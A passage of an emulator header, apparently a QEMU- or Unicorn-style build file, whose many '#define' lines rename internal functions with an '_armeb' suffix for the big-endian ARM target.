ppc_tb_set_jmp_target ppc_tb_set_jmp_target_armeb +#define use_idiv_instructions_rt use_idiv_instructions_rt_armeb +#define tcg_target_deposit_valid tcg_target_deposit_valid_armeb +#define helper_power_down helper_power_down_armeb +#define check_exit_request check_exit_request_armeb +#define address_space_unregister address_space_unregister_armeb +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_armeb +#define phys_mem_clean phys_mem_clean_armeb +#define tb_cleanup tb_cleanup_armeb +#define memory_map memory_map_armeb +#define memory_map_ptr memory_map_ptr_armeb +#define memory_unmap memory_unmap_armeb +#define memory_free memory_free_armeb +#define free_code_gen_buffer free_code_gen_buffer_armeb +#define helper_raise_exception helper_raise_exception_armeb +#define tcg_enabled tcg_enabled_armeb +#define tcg_exec_init tcg_exec_init_armeb +#define memory_register_types memory_register_types_armeb +#define cpu_exec_init_all cpu_exec_init_all_armeb +#define vm_start vm_start_armeb +#define resume_all_vcpus resume_all_vcpus_armeb +#define a15_l2ctlr_read a15_l2ctlr_read_armeb +#define a64_translate_init a64_translate_init_armeb +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_armeb +#define aa64_cacheop_access aa64_cacheop_access_armeb +#define aa64_daif_access aa64_daif_access_armeb +#define aa64_daif_write aa64_daif_write_armeb +#define aa64_dczid_read aa64_dczid_read_armeb +#define aa64_fpcr_read aa64_fpcr_read_armeb +#define aa64_fpcr_write aa64_fpcr_write_armeb +#define aa64_fpsr_read aa64_fpsr_read_armeb +#define aa64_fpsr_write aa64_fpsr_write_armeb +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_armeb +#define aa64_zva_access aa64_zva_access_armeb +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_armeb +#define aarch64_restore_sp aarch64_restore_sp_armeb +#define aarch64_save_sp aarch64_save_sp_armeb +#define accel_find accel_find_armeb +#define accel_init_machine accel_init_machine_armeb +#define accel_type accel_type_armeb +#define access_with_adjusted_size access_with_adjusted_size_armeb +#define add128 add128_armeb +#define add16_sat add16_sat_armeb +#define add16_usat add16_usat_armeb +#define add192 add192_armeb +#define add8_sat add8_sat_armeb +#define add8_usat add8_usat_armeb +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_armeb +#define add_cpreg_to_list add_cpreg_to_list_armeb +#define addFloat128Sigs addFloat128Sigs_armeb +#define addFloat32Sigs addFloat32Sigs_armeb +#define addFloat64Sigs addFloat64Sigs_armeb +#define addFloatx80Sigs addFloatx80Sigs_armeb +#define add_qemu_ldst_label add_qemu_ldst_label_armeb +#define address_space_access_valid address_space_access_valid_armeb +#define address_space_destroy address_space_destroy_armeb +#define address_space_destroy_dispatch address_space_destroy_dispatch_armeb +#define address_space_get_flatview address_space_get_flatview_armeb +#define address_space_init address_space_init_armeb +#define address_space_init_dispatch address_space_init_dispatch_armeb +#define address_space_lookup_region address_space_lookup_region_armeb +#define address_space_map address_space_map_armeb +#define address_space_read address_space_read_armeb +#define address_space_rw address_space_rw_armeb +#define address_space_translate address_space_translate_armeb +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_armeb +#define address_space_translate_internal address_space_translate_internal_armeb +#define address_space_unmap address_space_unmap_armeb +#define address_space_update_topology address_space_update_topology_armeb +#define address_space_update_topology_pass address_space_update_topology_pass_armeb +#define address_space_write address_space_write_armeb +#define addrrange_contains addrrange_contains_armeb +#define addrrange_end addrrange_end_armeb +#define addrrange_equal addrrange_equal_armeb +#define addrrange_intersection addrrange_intersection_armeb +#define addrrange_intersects addrrange_intersects_armeb +#define addrrange_make addrrange_make_armeb +#define adjust_endianness adjust_endianness_armeb +#define all_helpers all_helpers_armeb +#define alloc_code_gen_buffer alloc_code_gen_buffer_armeb +#define alloc_entry alloc_entry_armeb +#define always_true always_true_armeb +#define arm1026_initfn arm1026_initfn_armeb +#define arm1136_initfn arm1136_initfn_armeb +#define arm1136_r2_initfn arm1136_r2_initfn_armeb +#define arm1176_initfn arm1176_initfn_armeb +#define arm11mpcore_initfn arm11mpcore_initfn_armeb +#define arm926_initfn arm926_initfn_armeb +#define arm946_initfn arm946_initfn_armeb +#define arm_ccnt_enabled arm_ccnt_enabled_armeb +#define arm_cp_read_zero arm_cp_read_zero_armeb +#define arm_cp_reset_ignore arm_cp_reset_ignore_armeb +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_armeb +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_armeb +#define arm_cpu_finalizefn arm_cpu_finalizefn_armeb +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_armeb +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_armeb +#define arm_cpu_initfn arm_cpu_initfn_armeb +#define arm_cpu_list arm_cpu_list_armeb +#define cpu_loop_exit cpu_loop_exit_armeb +#define arm_cpu_post_init arm_cpu_post_init_armeb +#define arm_cpu_realizefn arm_cpu_realizefn_armeb +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_armeb +#define arm_cpu_register_types arm_cpu_register_types_armeb +#define cpu_resume_from_signal cpu_resume_from_signal_armeb +#define arm_cpus arm_cpus_armeb +#define arm_cpu_set_pc arm_cpu_set_pc_armeb +#define arm_cp_write_ignore arm_cp_write_ignore_armeb +#define arm_current_el arm_current_el_armeb +#define arm_dc_feature arm_dc_feature_armeb +#define arm_debug_excp_handler arm_debug_excp_handler_armeb +#define arm_debug_target_el arm_debug_target_el_armeb +#define arm_el_is_aa64 arm_el_is_aa64_armeb +#define arm_env_get_cpu arm_env_get_cpu_armeb +#define arm_excp_target_el arm_excp_target_el_armeb +#define arm_excp_unmasked arm_excp_unmasked_armeb +#define arm_feature arm_feature_armeb +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_armeb +#define gen_intermediate_code gen_intermediate_code_armeb +#define gen_intermediate_code_pc gen_intermediate_code_pc_armeb +#define arm_gen_test_cc arm_gen_test_cc_armeb +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_armeb +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_armeb +#define arm_handle_psci_call arm_handle_psci_call_armeb +#define arm_is_psci_call arm_is_psci_call_armeb +#define arm_is_secure arm_is_secure_armeb +#define arm_is_secure_below_el3 arm_is_secure_below_el3_armeb +#define arm_ldl_code arm_ldl_code_armeb +#define arm_lduw_code arm_lduw_code_armeb +#define arm_log_exception arm_log_exception_armeb +#define arm_reg_read arm_reg_read_armeb +#define arm_reg_reset arm_reg_reset_armeb +#define arm_reg_write arm_reg_write_armeb +#define restore_state_to_opc restore_state_to_opc_armeb +#define arm_rmode_to_sf arm_rmode_to_sf_armeb +#define arm_singlestep_active arm_singlestep_active_armeb +#define tlb_fill tlb_fill_armeb +#define tlb_flush tlb_flush_armeb +#define tlb_flush_page tlb_flush_page_armeb +#define tlb_set_page tlb_set_page_armeb +#define arm_translate_init arm_translate_init_armeb +#define arm_v7m_class_init arm_v7m_class_init_armeb +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_armeb +#define ats_access ats_access_armeb +#define ats_write ats_write_armeb +#define bad_mode_switch bad_mode_switch_armeb +#define bank_number bank_number_armeb +#define bitmap_zero_extend bitmap_zero_extend_armeb +#define bp_wp_matches bp_wp_matches_armeb +#define breakpoint_invalidate breakpoint_invalidate_armeb +#define build_page_bitmap build_page_bitmap_armeb +#define bus_add_child bus_add_child_armeb +#define bus_class_init bus_class_init_armeb +#define bus_info bus_info_armeb +#define bus_unparent bus_unparent_armeb +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_armeb +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_armeb +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_armeb +#define call_recip_estimate call_recip_estimate_armeb +#define can_merge can_merge_armeb +#define capacity_increase capacity_increase_armeb +#define ccsidr_read ccsidr_read_armeb +#define check_ap check_ap_armeb +#define check_breakpoints check_breakpoints_armeb +#define check_watchpoints check_watchpoints_armeb +#define cho cho_armeb +#define clear_bit clear_bit_armeb +#define clz32 clz32_armeb +#define clz64 clz64_armeb +#define cmp_flatrange_addr cmp_flatrange_addr_armeb +#define code_gen_alloc code_gen_alloc_armeb +#define commonNaNToFloat128 commonNaNToFloat128_armeb +#define commonNaNToFloat16 commonNaNToFloat16_armeb +#define commonNaNToFloat32 commonNaNToFloat32_armeb +#define commonNaNToFloat64 commonNaNToFloat64_armeb +#define commonNaNToFloatx80 commonNaNToFloatx80_armeb +#define compute_abs_deadline compute_abs_deadline_armeb +#define cond_name cond_name_armeb +#define configure_accelerator configure_accelerator_armeb +#define container_get container_get_armeb +#define container_info container_info_armeb +#define container_register_types container_register_types_armeb +#define contextidr_write contextidr_write_armeb +#define core_log_global_start core_log_global_start_armeb +#define core_log_global_stop core_log_global_stop_armeb +#define core_memory_listener core_memory_listener_armeb +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_armeb +#define cortex_a15_initfn cortex_a15_initfn_armeb +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_armeb +#define cortex_a8_initfn cortex_a8_initfn_armeb +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_armeb +#define cortex_a9_initfn cortex_a9_initfn_armeb +#define cortex_m3_initfn cortex_m3_initfn_armeb +#define count_cpreg count_cpreg_armeb +#define countLeadingZeros32 countLeadingZeros32_armeb +#define countLeadingZeros64 countLeadingZeros64_armeb +#define cp_access_ok cp_access_ok_armeb +#define cpacr_write cpacr_write_armeb +#define cpreg_field_is_64bit cpreg_field_is_64bit_armeb +#define cp_reginfo cp_reginfo_armeb +#define cpreg_key_compare cpreg_key_compare_armeb +#define cpreg_make_keylist cpreg_make_keylist_armeb +#define cp_reg_reset cp_reg_reset_armeb +#define cpreg_to_kvm_id cpreg_to_kvm_id_armeb +#define cpsr_read cpsr_read_armeb +#define cpsr_write cpsr_write_armeb +#define cptype_valid cptype_valid_armeb +#define cpu_abort cpu_abort_armeb +#define cpu_arm_exec cpu_arm_exec_armeb +#define cpu_arm_gen_code cpu_arm_gen_code_armeb +#define cpu_arm_init cpu_arm_init_armeb +#define cpu_breakpoint_insert cpu_breakpoint_insert_armeb +#define cpu_breakpoint_remove cpu_breakpoint_remove_armeb +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_armeb +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_armeb +#define cpu_can_do_io cpu_can_do_io_armeb +#define cpu_can_run cpu_can_run_armeb +#define cpu_class_init cpu_class_init_armeb +#define cpu_common_class_by_name cpu_common_class_by_name_armeb +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_armeb +#define cpu_common_get_arch_id cpu_common_get_arch_id_armeb +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_armeb +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_armeb +#define cpu_common_has_work cpu_common_has_work_armeb +#define cpu_common_initfn cpu_common_initfn_armeb +#define cpu_common_noop cpu_common_noop_armeb +#define cpu_common_parse_features cpu_common_parse_features_armeb +#define cpu_common_realizefn cpu_common_realizefn_armeb +#define cpu_common_reset cpu_common_reset_armeb +#define cpu_dump_statistics cpu_dump_statistics_armeb +#define cpu_exec_init cpu_exec_init_armeb +#define cpu_flush_icache_range cpu_flush_icache_range_armeb +#define cpu_gen_init cpu_gen_init_armeb +#define cpu_get_clock cpu_get_clock_armeb +#define cpu_get_real_ticks cpu_get_real_ticks_armeb +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_armeb +#define cpu_handle_debug_exception cpu_handle_debug_exception_armeb +#define cpu_handle_guest_debug cpu_handle_guest_debug_armeb +#define cpu_inb cpu_inb_armeb +#define cpu_inl cpu_inl_armeb +#define cpu_interrupt cpu_interrupt_armeb +#define cpu_interrupt_handler cpu_interrupt_handler_armeb +#define cpu_inw cpu_inw_armeb +#define cpu_io_recompile cpu_io_recompile_armeb +#define cpu_is_stopped cpu_is_stopped_armeb +#define cpu_ldl_code cpu_ldl_code_armeb +#define cpu_ldub_code cpu_ldub_code_armeb +#define cpu_lduw_code cpu_lduw_code_armeb +#define cpu_memory_rw_debug cpu_memory_rw_debug_armeb +#define cpu_mmu_index cpu_mmu_index_armeb +#define cpu_outb cpu_outb_armeb +#define cpu_outl cpu_outl_armeb +#define cpu_outw cpu_outw_armeb +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_armeb +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_armeb +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_armeb +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_armeb +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_armeb +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_armeb +#define cpu_physical_memory_map cpu_physical_memory_map_armeb +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_armeb +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_armeb +#define cpu_physical_memory_rw cpu_physical_memory_rw_armeb +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_armeb +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_armeb +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_armeb +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_armeb +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_armeb +#define cpu_register cpu_register_armeb +#define cpu_register_types cpu_register_types_armeb +#define cpu_restore_state cpu_restore_state_armeb +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_armeb +#define cpu_single_step cpu_single_step_armeb +#define cpu_tb_exec cpu_tb_exec_armeb +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_armeb +#define cpu_to_be64 cpu_to_be64_armeb +#define cpu_to_le32 cpu_to_le32_armeb +#define cpu_to_le64 cpu_to_le64_armeb +#define cpu_type_info cpu_type_info_armeb +#define cpu_unassigned_access cpu_unassigned_access_armeb +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_armeb +#define cpu_watchpoint_insert cpu_watchpoint_insert_armeb +#define cpu_watchpoint_remove cpu_watchpoint_remove_armeb +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_armeb +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_armeb +#define crc32c_table crc32c_table_armeb +#define create_new_memory_mapping create_new_memory_mapping_armeb +#define csselr_write csselr_write_armeb +#define cto32 cto32_armeb +#define ctr_el0_access ctr_el0_access_armeb +#define ctz32 ctz32_armeb +#define ctz64 ctz64_armeb +#define dacr_write dacr_write_armeb +#define dbgbcr_write dbgbcr_write_armeb +#define dbgbvr_write dbgbvr_write_armeb +#define dbgwcr_write dbgwcr_write_armeb +#define dbgwvr_write dbgwvr_write_armeb +#define debug_cp_reginfo debug_cp_reginfo_armeb +#define debug_frame debug_frame_armeb +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_armeb +#define define_arm_cp_regs define_arm_cp_regs_armeb +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_armeb +#define define_debug_regs define_debug_regs_armeb +#define define_one_arm_cp_reg define_one_arm_cp_reg_armeb +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_armeb +#define deposit32 deposit32_armeb +#define deposit64 deposit64_armeb +#define deregister_tm_clones deregister_tm_clones_armeb +#define device_class_base_init device_class_base_init_armeb +#define device_class_init device_class_init_armeb +#define device_finalize device_finalize_armeb +#define device_get_realized device_get_realized_armeb +#define device_initfn device_initfn_armeb +#define device_post_init device_post_init_armeb +#define device_reset device_reset_armeb +#define device_set_realized device_set_realized_armeb +#define device_type_info device_type_info_armeb +#define disas_arm_insn disas_arm_insn_armeb +#define disas_coproc_insn disas_coproc_insn_armeb +#define disas_dsp_insn disas_dsp_insn_armeb +#define disas_iwmmxt_insn disas_iwmmxt_insn_armeb +#define disas_neon_data_insn disas_neon_data_insn_armeb +#define disas_neon_ls_insn disas_neon_ls_insn_armeb +#define disas_thumb2_insn disas_thumb2_insn_armeb +#define disas_thumb_insn disas_thumb_insn_armeb +#define disas_vfp_insn disas_vfp_insn_armeb +#define disas_vfp_v8_insn disas_vfp_v8_insn_armeb +#define do_arm_semihosting do_arm_semihosting_armeb +#define do_clz16 do_clz16_armeb +#define do_clz8 do_clz8_armeb +#define do_constant_folding do_constant_folding_armeb +#define do_constant_folding_2 do_constant_folding_2_armeb +#define do_constant_folding_cond do_constant_folding_cond_armeb +#define do_constant_folding_cond2 do_constant_folding_cond2_armeb +#define do_constant_folding_cond_32 do_constant_folding_cond_32_armeb +#define do_constant_folding_cond_64 do_constant_folding_cond_64_armeb +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_armeb +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_armeb +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_armeb +#define do_ssat do_ssat_armeb +#define do_usad do_usad_armeb +#define do_usat do_usat_armeb +#define do_v7m_exception_exit do_v7m_exception_exit_armeb +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_armeb +#define dummy_func dummy_func_armeb +#define dummy_section dummy_section_armeb +#define _DYNAMIC _DYNAMIC_armeb +#define _edata _edata_armeb +#define _end _end_armeb +#define end_list end_list_armeb +#define eq128 eq128_armeb +#define ErrorClass_lookup ErrorClass_lookup_armeb +#define error_copy error_copy_armeb +#define error_exit error_exit_armeb +#define error_get_class error_get_class_armeb +#define error_get_pretty error_get_pretty_armeb +#define error_setg_file_open error_setg_file_open_armeb +#define estimateDiv128To64 estimateDiv128To64_armeb +#define estimateSqrt32 estimateSqrt32_armeb +#define excnames excnames_armeb +#define excp_is_internal excp_is_internal_armeb +#define extended_addresses_enabled extended_addresses_enabled_armeb +#define extended_mpu_ap_bits extended_mpu_ap_bits_armeb +#define extract32 extract32_armeb +#define extract64 extract64_armeb +#define extractFloat128Exp extractFloat128Exp_armeb +#define extractFloat128Frac0 extractFloat128Frac0_armeb +#define extractFloat128Frac1 extractFloat128Frac1_armeb +#define extractFloat128Sign extractFloat128Sign_armeb +#define extractFloat16Exp extractFloat16Exp_armeb +#define extractFloat16Frac extractFloat16Frac_armeb +#define extractFloat16Sign extractFloat16Sign_armeb +#define extractFloat32Exp extractFloat32Exp_armeb +#define extractFloat32Frac extractFloat32Frac_armeb +#define extractFloat32Sign extractFloat32Sign_armeb +#define extractFloat64Exp extractFloat64Exp_armeb +#define extractFloat64Frac extractFloat64Frac_armeb +#define extractFloat64Sign extractFloat64Sign_armeb +#define extractFloatx80Exp extractFloatx80Exp_armeb +#define extractFloatx80Frac extractFloatx80Frac_armeb +#define extractFloatx80Sign extractFloatx80Sign_armeb +#define fcse_write fcse_write_armeb +#define find_better_copy find_better_copy_armeb +#define find_default_machine find_default_machine_armeb +#define find_desc_by_name find_desc_by_name_armeb +#define find_first_bit find_first_bit_armeb +#define find_paging_enabled_cpu find_paging_enabled_cpu_armeb +#define find_ram_block find_ram_block_armeb +#define find_ram_offset find_ram_offset_armeb +#define find_string find_string_armeb +#define find_type find_type_armeb +#define _fini _fini_armeb +#define flatrange_equal flatrange_equal_armeb +#define flatview_destroy flatview_destroy_armeb +#define flatview_init flatview_init_armeb +#define flatview_insert flatview_insert_armeb +#define flatview_lookup flatview_lookup_armeb +#define flatview_ref flatview_ref_armeb +#define flatview_simplify flatview_simplify_armeb +#define flatview_unref flatview_unref_armeb +#define float128_add float128_add_armeb +#define float128_compare float128_compare_armeb +#define float128_compare_internal float128_compare_internal_armeb +#define float128_compare_quiet float128_compare_quiet_armeb +#define float128_default_nan float128_default_nan_armeb +#define float128_div float128_div_armeb +#define float128_eq float128_eq_armeb +#define float128_eq_quiet float128_eq_quiet_armeb +#define float128_is_quiet_nan float128_is_quiet_nan_armeb +#define float128_is_signaling_nan float128_is_signaling_nan_armeb +#define float128_le float128_le_armeb +#define float128_le_quiet float128_le_quiet_armeb +#define float128_lt float128_lt_armeb +#define float128_lt_quiet float128_lt_quiet_armeb +#define float128_maybe_silence_nan float128_maybe_silence_nan_armeb +#define float128_mul float128_mul_armeb +#define float128_rem float128_rem_armeb +#define float128_round_to_int float128_round_to_int_armeb +#define float128_scalbn float128_scalbn_armeb +#define float128_sqrt float128_sqrt_armeb +#define float128_sub float128_sub_armeb +#define float128ToCommonNaN float128ToCommonNaN_armeb +#define float128_to_float32 float128_to_float32_armeb +#define float128_to_float64 float128_to_float64_armeb +#define float128_to_floatx80 float128_to_floatx80_armeb +#define float128_to_int32 float128_to_int32_armeb +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_armeb +#define float128_to_int64 float128_to_int64_armeb +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_armeb +#define float128_unordered float128_unordered_armeb +#define float128_unordered_quiet float128_unordered_quiet_armeb +#define float16_default_nan float16_default_nan_armeb +#define float16_is_quiet_nan float16_is_quiet_nan_armeb +#define float16_is_signaling_nan float16_is_signaling_nan_armeb +#define float16_maybe_silence_nan float16_maybe_silence_nan_armeb +#define float16ToCommonNaN float16ToCommonNaN_armeb +#define float16_to_float32 float16_to_float32_armeb +#define float16_to_float64 float16_to_float64_armeb +#define float32_abs float32_abs_armeb +#define float32_add float32_add_armeb +#define float32_chs float32_chs_armeb +#define float32_compare float32_compare_armeb +#define float32_compare_internal float32_compare_internal_armeb +#define float32_compare_quiet float32_compare_quiet_armeb +#define float32_default_nan float32_default_nan_armeb +#define float32_div float32_div_armeb +#define float32_eq float32_eq_armeb +#define float32_eq_quiet float32_eq_quiet_armeb +#define float32_exp2 float32_exp2_armeb +#define float32_exp2_coefficients float32_exp2_coefficients_armeb +#define float32_is_any_nan float32_is_any_nan_armeb +#define float32_is_infinity float32_is_infinity_armeb +#define float32_is_neg float32_is_neg_armeb +#define float32_is_quiet_nan float32_is_quiet_nan_armeb +#define float32_is_signaling_nan float32_is_signaling_nan_armeb +#define float32_is_zero float32_is_zero_armeb +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_armeb +#define float32_le float32_le_armeb +#define float32_le_quiet float32_le_quiet_armeb +#define float32_log2 float32_log2_armeb +#define float32_lt float32_lt_armeb +#define float32_lt_quiet float32_lt_quiet_armeb +#define float32_max float32_max_armeb +#define float32_maxnum float32_maxnum_armeb +#define float32_maxnummag float32_maxnummag_armeb +#define float32_maybe_silence_nan float32_maybe_silence_nan_armeb +#define float32_min float32_min_armeb +#define float32_minmax float32_minmax_armeb +#define float32_minnum float32_minnum_armeb +#define float32_minnummag float32_minnummag_armeb +#define float32_mul float32_mul_armeb +#define float32_muladd float32_muladd_armeb +#define float32_rem float32_rem_armeb +#define float32_round_to_int float32_round_to_int_armeb +#define float32_scalbn float32_scalbn_armeb +#define float32_set_sign float32_set_sign_armeb +#define float32_sqrt float32_sqrt_armeb +#define float32_squash_input_denormal float32_squash_input_denormal_armeb +#define float32_sub float32_sub_armeb +#define float32ToCommonNaN float32ToCommonNaN_armeb +#define float32_to_float128 float32_to_float128_armeb +#define float32_to_float16 float32_to_float16_armeb +#define float32_to_float64 float32_to_float64_armeb +#define float32_to_floatx80 float32_to_floatx80_armeb +#define float32_to_int16 float32_to_int16_armeb +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_armeb +#define float32_to_int32 float32_to_int32_armeb +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_armeb +#define float32_to_int64 float32_to_int64_armeb +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_armeb +#define float32_to_uint16 float32_to_uint16_armeb +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_armeb +#define float32_to_uint32 float32_to_uint32_armeb +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_armeb +#define float32_to_uint64 float32_to_uint64_armeb +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_armeb +#define float32_unordered float32_unordered_armeb +#define float32_unordered_quiet float32_unordered_quiet_armeb +#define float64_abs float64_abs_armeb +#define float64_add float64_add_armeb +#define float64_chs float64_chs_armeb +#define float64_compare float64_compare_armeb +#define float64_compare_internal float64_compare_internal_armeb +#define float64_compare_quiet float64_compare_quiet_armeb +#define float64_default_nan float64_default_nan_armeb +#define float64_div float64_div_armeb +#define float64_eq float64_eq_armeb +#define float64_eq_quiet float64_eq_quiet_armeb +#define float64_is_any_nan float64_is_any_nan_armeb +#define float64_is_infinity float64_is_infinity_armeb +#define float64_is_neg float64_is_neg_armeb +#define float64_is_quiet_nan float64_is_quiet_nan_armeb +#define float64_is_signaling_nan float64_is_signaling_nan_armeb +#define float64_is_zero float64_is_zero_armeb +#define float64_le float64_le_armeb +#define float64_le_quiet float64_le_quiet_armeb +#define float64_log2 float64_log2_armeb +#define float64_lt float64_lt_armeb +#define float64_lt_quiet float64_lt_quiet_armeb +#define float64_max float64_max_armeb +#define float64_maxnum float64_maxnum_armeb +#define float64_maxnummag float64_maxnummag_armeb +#define float64_maybe_silence_nan float64_maybe_silence_nan_armeb +#define float64_min float64_min_armeb +#define float64_minmax float64_minmax_armeb +#define float64_minnum float64_minnum_armeb +#define float64_minnummag float64_minnummag_armeb +#define float64_mul float64_mul_armeb +#define float64_muladd float64_muladd_armeb +#define float64_rem float64_rem_armeb +#define float64_round_to_int float64_round_to_int_armeb +#define float64_scalbn float64_scalbn_armeb +#define float64_set_sign float64_set_sign_armeb +#define float64_sqrt float64_sqrt_armeb +#define float64_squash_input_denormal float64_squash_input_denormal_armeb +#define float64_sub float64_sub_armeb +#define float64ToCommonNaN float64ToCommonNaN_armeb +#define float64_to_float128 float64_to_float128_armeb +#define float64_to_float16 float64_to_float16_armeb +#define float64_to_float32 float64_to_float32_armeb +#define float64_to_floatx80 float64_to_floatx80_armeb +#define float64_to_int16 float64_to_int16_armeb +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_armeb +#define float64_to_int32 float64_to_int32_armeb +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_armeb +#define float64_to_int64 float64_to_int64_armeb +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_armeb +#define float64_to_uint16 float64_to_uint16_armeb +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_armeb +#define float64_to_uint32 float64_to_uint32_armeb +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_armeb +#define float64_to_uint64 float64_to_uint64_armeb +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_armeb +#define float64_trunc_to_int float64_trunc_to_int_armeb +#define float64_unordered float64_unordered_armeb +#define float64_unordered_quiet float64_unordered_quiet_armeb +#define float_raise float_raise_armeb +#define floatx80_add floatx80_add_armeb +#define floatx80_compare floatx80_compare_armeb +#define floatx80_compare_internal floatx80_compare_internal_armeb +#define floatx80_compare_quiet floatx80_compare_quiet_armeb +#define floatx80_default_nan floatx80_default_nan_armeb +#define floatx80_div floatx80_div_armeb +#define floatx80_eq floatx80_eq_armeb +#define floatx80_eq_quiet floatx80_eq_quiet_armeb +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_armeb +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_armeb +#define floatx80_le floatx80_le_armeb +#define floatx80_le_quiet floatx80_le_quiet_armeb +#define floatx80_lt floatx80_lt_armeb +#define floatx80_lt_quiet floatx80_lt_quiet_armeb +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_armeb +#define floatx80_mul floatx80_mul_armeb +#define floatx80_rem floatx80_rem_armeb +#define floatx80_round_to_int floatx80_round_to_int_armeb +#define floatx80_scalbn floatx80_scalbn_armeb +#define floatx80_sqrt floatx80_sqrt_armeb +#define floatx80_sub floatx80_sub_armeb +#define floatx80ToCommonNaN floatx80ToCommonNaN_armeb +#define floatx80_to_float128 floatx80_to_float128_armeb +#define floatx80_to_float32 floatx80_to_float32_armeb +#define floatx80_to_float64 floatx80_to_float64_armeb +#define floatx80_to_int32 floatx80_to_int32_armeb +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_armeb +#define floatx80_to_int64 floatx80_to_int64_armeb +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_armeb +#define floatx80_unordered floatx80_unordered_armeb +#define floatx80_unordered_quiet floatx80_unordered_quiet_armeb +#define flush_icache_range flush_icache_range_armeb +#define format_string format_string_armeb +#define fp_decode_rm fp_decode_rm_armeb +#define frame_dummy frame_dummy_armeb +#define free_range free_range_armeb +#define fstat64 fstat64_armeb +#define futex_wait futex_wait_armeb +#define futex_wake futex_wake_armeb +#define gen_aa32_ld16s gen_aa32_ld16s_armeb +#define gen_aa32_ld16u gen_aa32_ld16u_armeb +#define gen_aa32_ld32u gen_aa32_ld32u_armeb +#define gen_aa32_ld64 gen_aa32_ld64_armeb +#define gen_aa32_ld8s gen_aa32_ld8s_armeb +#define gen_aa32_ld8u gen_aa32_ld8u_armeb +#define gen_aa32_st16 gen_aa32_st16_armeb +#define gen_aa32_st32 gen_aa32_st32_armeb +#define gen_aa32_st64 gen_aa32_st64_armeb +#define gen_aa32_st8 gen_aa32_st8_armeb +#define gen_adc gen_adc_armeb +#define gen_adc_CC gen_adc_CC_armeb +#define gen_add16 gen_add16_armeb +#define gen_add_carry gen_add_carry_armeb +#define gen_add_CC gen_add_CC_armeb +#define gen_add_datah_offset gen_add_datah_offset_armeb +#define gen_add_data_offset gen_add_data_offset_armeb +#define gen_addq gen_addq_armeb +#define gen_addq_lo gen_addq_lo_armeb +#define gen_addq_msw gen_addq_msw_armeb +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_armeb +#define gen_arm_shift_im gen_arm_shift_im_armeb +#define gen_arm_shift_reg gen_arm_shift_reg_armeb +#define gen_bx gen_bx_armeb +#define gen_bx_im 